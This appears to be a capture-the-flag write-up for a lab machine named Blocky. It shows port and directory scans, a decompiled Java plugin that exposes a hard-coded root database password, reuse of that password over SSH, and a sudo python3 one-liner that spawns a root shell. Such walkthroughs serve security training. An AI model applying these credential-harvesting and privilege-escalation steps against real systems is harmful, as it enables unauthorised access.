ENUMERATION

PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster Scan:

/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/index.php            (Status: 301) [Size: 0] [--> http://10.10.10.37/]
/javascript           (Status: 301) [Size: 315] [--> http://10.10.10.37/javascript/]
/phpmyadmin           (Status: 301) [Size: 315] [--> http://10.10.10.37/phpmyadmin/]
/plugins              (Status: 301) [Size: 312] [--> http://10.10.10.37/plugins/]   
/server-status        (Status: 403) [Size: 299]                                     
/wiki                 (Status: 301) [Size: 309] [--> http://10.10.10.37/wiki/]      
/wp-admin             (Status: 301) [Size: 313] [--> http://10.10.10.37/wp-admin/]  
/wp-content           (Status: 301) [Size: 315] [--> http://10.10.10.37/wp-content/]
/wp-includes          (Status: 301) [Size: 316] [--> http://10.10.10.37/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]

Visiting /Plugins we see two jar files which we download . On running it shows “NO MANIFEST ATTRIBUTE” so i did simple strings and it gave a probable username -> ryanhamshire

FOOTHOLD

On decompiling the jar files we get some credentials and we can login to /phpmyadmin using those:

/* Decompiler 2ms, total 365ms, lines 21 */
package com.myfirstplugin;

public class BlockyCore {
   public String sqlHost = "localhost";
   public String sqlUser = "root";
   public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

   public void onServerStart() {
   }

   public void onServerStop() {
   }

   public void onPlayerJoin() {
      this.sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
   }

   public void sendMessage(String username, String message) {
   }
}

There in the following link :

http://10.10.10.37/phpmyadmin/sql.php?db=wordpress&token=9e1f2a9aa56a0c0f869de8b0bfe9afd5&goto=db_structure.php&table=wp_users&pos=0

We find user name and pass, however we could not crack the hash , but trying the previously found credentials from the decompiled file gave us success when we logged in via ssh and now we can grab the user flag.

PRIVILEGE ESCALATION

Running sudo -l on the machine shows us that we have permissions to execute every command so I ran my python exploit from GTFOBins to get root.

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch@Blocky:~$ sudo python3 -c 'import os; os.system("/bin/sh")'
# whoami
root